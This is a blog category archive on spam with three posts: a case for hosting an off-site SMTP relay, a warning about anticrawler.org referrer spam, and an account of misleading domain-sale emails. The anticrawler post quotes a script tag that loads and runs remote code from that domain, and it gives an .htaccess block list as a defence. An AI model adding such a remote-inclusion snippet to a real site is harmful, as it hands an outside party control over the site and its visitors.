Category Archives: Spam

Using an SMTP mail relay to secure a network

Small businesses with Exchange Server or other mail servers tend to have their mail server physically located in their office (in a DMZ), which is great for performance and communicating with each other, but they tend to run all their anti-spam and virus filtering on the same server. This brings up a number of issues.

  1. Windows Server anti virus and anti spam products tend to be resource intensive.
  2. Legislation in most locals require that all email is archived for x number of years, if you receive 80% spam on your email, it means that to.
  3. Your DNS MX record is being advertised to the world, while security through obscurity is never the answer, why advertise your public IP.
  4. RBLs will blacklist your public IP if you are found to have a spam producing virus, causing your outbound mail to bounce, it can take weeks to get off GMail and Hotmail’s spam lists.
  5. Some ISPs are not reliable, while a small office maybe unhappy about not having internet access for half a day, missing emails can have a greater business impact.
  6. It’s rare, but some ISPs will block port 25 which is used to relay mail between servers if they see what they consider as abuse, normally sending a warning first.

mail_relay

The answer to these risks is hosting a mail relay off-site, maybe even 2 if you want that resilience, but over the last 5 years, apart from reboots forced by updates taking 10 minutes every few months, I’ve not seen a customer impacting outage.

Your office mail server can block all incoming and outgoing SMTP traffic except between the mail relay, deleting the most obvious spam and all the viruses before the mail is delivered to your office. Also filtering outgoing email, ensuring you are not spreading viruses in the company’s name, and enforcing any other security policies you may have in place. Most abuse against an Exchange Server is against port 25, the public will not even see it exists. It will make it far less obvious what your public IP is.

You can block on your firewall all smtp traffic on the network except between the Server and the Relay, if someone brings in a an infected laptop and joins your network, it wont get you RBL listed, and the ISP wont block your port 25.

I have for more than a decade used Symantec Endpoint Protection for this purpose, but their SMTP relay can only be installed on bare metal or in a virtual machine, also for some strange reason require separate IP addresses for inbound and outbound and the costs are not so low for these to be hosted outside the office, and the performance and usability is no better than a free mail relay package such as MailScanner, which can easily be installed on a small cloud instance, as a guide I have 50 (heavy) users using one $20 a month DigitalOcean instance, and the processor and memory never goes over 20% and 600 (more regular) users using 2x $40 instances at different data centers.

This mitigation in no way suggests that you do not run anti-virus software on the workstations, this is still essential as not all virus infection come from email, and you should still have anti-spam filtering to fine tune the removal of the less obvious spam as it is simplest to set the relay to only delete the obvious, Microsoft own filter is usually ample for this.

While MailScanner itself is free, some of the RBL and signature subscriptions can be pricey, but a default installation which include amongst others Clam AV. Spam detection and Spamassassin is fine in most cases, also unlike Symantec’s pricing model, most additions to MailScanner are not charged at a per user license model.

This model works just as well in a distributed environment if you have a co-located mail server. Even adding a mail relay to a heavily firewalled website that wanted to hide the real IP of the host which was previously being leaked in automated emails from the site leading to a level 3/4 DDoS attack.

If you want assistance in setting such a configuration up, I am always available for hire, and if you have a suggestion to improve on this model, I am always willing to learn.

AntiCrawler, referrer spam turned nasty

AntiCrawler, referrer spam turned nasty, asking you to add potentially malicious code to your own site.

anticrawlerAlthough this is by far not the most popular blog, I do like to look in each day to check up on things, and I often see referrer spam, I always checkout what they are up to, it is a form of advertising, they show up in your site logs and analytics, of course you are going to check who’s sending you traffic, it’s nearly always “SEO” or marketing companies offering you more traffic, you can guess the quality of traffic they would provide just looking at their advertising method.

But the referral spam anticrawler.org  bot left a couple entries for yesterday is different, when I click through to it, a single page ironically telling you that if you “Put this JS to all pages of your website and you’ll never see BAD bots and crawlers”, the idea is ludicrous that some technology would “ping” crawlers to inform them not crawl your site, the script calls to include a PHP file anticrawler.php which will load from their site

<script>
document.write('<script src="//anticrawler.org/plugin/anticrawler.php?u=' + encodeURIComponent(document.location.href) + '"></' + 'script>');
</script>

When I open anticrawler.php, all it has in but to print to the screen this totally benign line of commented out code which does absolutely nothing:

//Pinging bots

But tomorrow it could be anything, as they can now run any code from your machine, I can only guess what the end game is here, maybe they haven’t decided yet, inject spam, add a backdoor to your site or server, launch attacks on other sites, or just infect your sites visitors with some other malware.

Of course you should not trust anyone using referral spam, the entries in your stats and analytics themselves are are not harmful, but they can be annoying in that they spoil the accuracy of the data you are collecting, so if you want to block AntiCrawler and other referrer spam, you can add a list to your .htaccess file in this format:

RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} http://anticrawler\.org [NC,OR]
RewriteCond %{HTTP_REFERER}ready-to-go\.com [NC,OR]
RewriteCond %{HTTP_REFERER} seamalt\.com
RewriteRule .* - [F]

Notice that all but the last entry has [NC,OR] at the end of the line and the \ before the .org is required.

Fake domain name sales

I was so happy with the response I got with my post regarding the fake ICANN appraiser scam a couple of months ago, I thought it worth sharing each of the dodgy domain name practices I come across as they hit my mailbox.

This one’s old, and I don’t know if you can call it a scam, more a serious misrepresentation, and this one is no where near as bad as some versions I have seen, only hitting you for triple the real value, I have seen some that will go for ten times, so I won’t mention the sellers by name. Here is how it works, domain-sales1you get a spam email regarding a domain name for sale, very similar to a domain you already have registered, normally it’s a .com if you have the .net, or a pluralisation.

it certainly reads as if they are selling a domain, I don’t think there is any doubt about it, clicking on the provided link the pitch is far more honest, stating that the domain is available as opposed to for sale.

domain-sales4

But a quick search at a registrar will prove that they didn’t own it to sell it, but were only going to register it, the name was free for anyone to own, a quick search on Google shows that the name was in use until recently, and they are guessing that you may have wanted it, so claim to own it, only actually registering it when someone shows an interest. Normal registration fees are normally a little more than $10 a year, but does this “sale” even include registration fees? inconveniently clicking on the button “Are there any additional fees?” provides nothing, as do the buttons, so we can only guess if that, and we will never know what “money-back guarantee” means to them. Of course the lesson here, if offered a domain for sale, is to always search if a name is available before you register it without having to buy it, as they often are.